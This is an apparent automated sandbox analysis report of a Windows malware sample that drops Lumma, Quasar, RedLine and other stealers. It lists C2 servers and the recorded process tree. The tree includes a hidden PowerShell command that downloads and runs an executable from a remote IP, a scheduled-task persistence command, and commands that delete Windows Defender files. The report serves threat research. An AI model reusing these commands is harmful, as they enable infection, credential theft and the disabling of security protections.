Overview

overview

10

Static

static

5

2025-05-16...er.exe

windows10-2004-x64

10

2025-05-16...er.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250502-en
  • resource tags

    arch:x64arch:x86image:win11-20250502-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    16/05/2025, 16:32

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-05-16_f45eb4070409639f6ae0810df95c47e5_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe

  • Size

    938KB

  • MD5

    f45eb4070409639f6ae0810df95c47e5

  • SHA1

    97e18a6754b573443993c782295b1925f23d049c

  • SHA256

    41cfd2a0a74038552ffd6bea6bf8534bbca244ce606a3ec1115c1272ff7f081d

  • SHA512

    3dd5a539b04559e2cbd0cb5f223372279202cdde92a3db6b7ace59c483bb6aa944ff25744f758d4c9eccb330d3c8db5b2e685d5188d1f9f085355c56a57b049d

  • SSDEEP

    24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8aMSb:zTvC/MTQYxsWR7aMS

Score
10/10
lummaquasarredlinerhadamanthyssectopratcheatoffice04defense_evasiondiscoveryexecutionexploitinfostealerpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.156.72.2/testmine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.156.72.2/testmine/random.exe

Extracted

Family

lumma

C2

https://anesthwtcm.run/ladj

https://saxecocnak.live/manj

https://testcawepr.run/dsap

https://emphatakpn.bet/ladk

https://laminaflbx.shop/twoq

https://overcovtcg.top/juhd

https://mblackswmxc.top/bgry

https://cposseswsnc.top/akds

https://featurlyin.top/pdal

https://cornerdurv.top/adwq

https://wovercovtcg.top/juhd

https://blackswmxc.top/bgry

https://oposseswsnc.top/akds

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

150.241.93.127:4782

Mutex

b7cfe346-f941-4787-b55a-bc367b29effc

Attributes
  • encryption_key

    40916E817BA124AC4511F76BF33E2E51068D45AB

  • install_name

    Client.exe

  • key_salt

    bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

redline

Botnet

cheat

C2

154.91.34.165:64951

Signatures

  • Detects Rhadamanthys payload 1 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 2 IoCs
  • Redline family
    redline
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Rhadamanthys family
    rhadamanthys
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 2 IoCs
  • Sectoprat family
    sectoprat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 13 IoCs
  • Possible privilege escalation attempt 3 IoCs
    exploit
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
    defense_evasion
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 7 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 6 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 17 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-05-16_f45eb4070409639f6ae0810df95c47e5_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-05-16_f45eb4070409639f6ae0810df95c47e5_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4720
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn uZBfVmarbQM /tr "mshta C:\Users\Admin\AppData\Local\Temp\cP0xNHvwB.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5064
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn uZBfVmarbQM /tr "mshta C:\Users\Admin\AppData\Local\Temp\cP0xNHvwB.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3120
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\cP0xNHvwB.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GB3GECTC0PJBJMMJAZOGFGSEWPWWWO9V.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1236
        • C:\Users\Admin\AppData\Local\TempGB3GECTC0PJBJMMJAZOGFGSEWPWWWO9V.EXE
          "C:\Users\Admin\AppData\Local\TempGB3GECTC0PJBJMMJAZOGFGSEWPWWWO9V.EXE"
          4⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
            "C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe"
            5⤵
            • Downloads MZ/PE file
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:780
            • C:\Users\Admin\AppData\Local\Temp\10126930101\f1cac16d99.exe
              "C:\Users\Admin\AppData\Local\Temp\10126930101\f1cac16d99.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1128
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2992
            • C:\Users\Admin\AppData\Local\Temp\10126940101\55d4a3d8a2.exe
              "C:\Users\Admin\AppData\Local\Temp\10126940101\55d4a3d8a2.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4592
            • C:\Users\Admin\AppData\Local\Temp\10126950101\43a6172ddc.exe
              "C:\Users\Admin\AppData\Local\Temp\10126950101\43a6172ddc.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2840
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4Yth9dU.bat" "
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2008
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4Yth9dU.bat" any_word
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:920
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 65001
                    9⤵
                      PID:1912
                    • C:\Windows\SysWOW64\reg.exe
                      reg query "HKU\S-1-5-19"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1940
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies data under HKEY_USERS
                      PID:660
                    • C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
                      NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\Admin\AppData\Local\Temp\4Yth9dU.bat
                      9⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2392
                    • C:\Windows\SysWOW64\mode.com
                      Mode 79,49
                      9⤵
                        PID:1964
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ver
                        9⤵
                          PID:8
                        • C:\Windows\SysWOW64\reg.exe
                          reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
                          9⤵
                          • System Location Discovery: System Language Discovery
                          PID:2616
                        • C:\Windows\SysWOW64\find.exe
                          find /i "0x0"
                          9⤵
                          • System Location Discovery: System Language Discovery
                          PID:1192
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c tasklist
                          9⤵
                            PID:4456
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist
                              10⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4508
                          • C:\Windows\SysWOW64\reg.exe
                            reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
                            9⤵
                              PID:2544
                            • C:\Windows\SysWOW64\reg.exe
                              reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:1820
                            • C:\Windows\SysWOW64\reg.exe
                              reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
                              9⤵
                                PID:1188
                              • C:\Windows\SysWOW64\reg.exe
                                reg query "HKLM\System\CurrentControlSet\Services\Sense"
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:4136
                              • C:\Windows\SysWOW64\reg.exe
                                reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
                                9⤵
                                • System Location Discovery: System Language Discovery
                                PID:3472
                              • C:\Windows\SysWOW64\reg.exe
                                reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
                                9⤵
                                  PID:2476
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
                                  9⤵
                                    PID:3344
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3328
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3532
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3080
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3764
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4632
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2804
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4036
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
                                    9⤵
                                      PID:4548
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
                                      9⤵
                                        PID:2072
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg query HKLM\System\CurrentControlset\Services\WdFilter
                                        9⤵
                                        • Modifies registry key
                                        PID:5056
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
                                        9⤵
                                          PID:4620
                                        • C:\Windows\SysWOW64\find.exe
                                          find /i "Windows 7"
                                          9⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1072
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" ver "
                                          9⤵
                                            PID:4932
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /c:"6.1.7601"
                                            9⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3400
                                          • C:\Users\Admin\AppData\Local\Temp\Work\7z.exe
                                            7z x -aoa -bso0 -bsp1 "DKTolz.zip" -p"DDK" "Unlocker.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5064
                                          • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                            Unlocker /currentDiskSize
                                            9⤵
                                            • Executes dropped EXE
                                            PID:1880
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                              10⤵
                                                PID:2228
                                                • C:\Windows\system32\sc.exe
                                                  sc query IObitUnlocker
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:4528
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "1880"
                                                10⤵
                                                  PID:4704
                                                  • C:\Windows\system32\taskkill.exe
                                                    taskkill /f /pid "1880"
                                                    11⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1632
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg query "HKLM\Software\Microsoft\Windows Advanced Threat Protection"
                                                9⤵
                                                  PID:1496
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC"
                                                  9⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2912
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg query "HKCR\Directory\shellex\ContextMenuHandlers\EPP"
                                                  9⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2020
                                                • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                                  Unlocker /dеlwd
                                                  9⤵
                                                  • Executes dropped EXE
                                                  PID:1076
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                    10⤵
                                                      PID:3832
                                                      • C:\Windows\system32\sc.exe
                                                        sc query IObitUnlocker
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:2448
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3924
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4860
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2664
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\W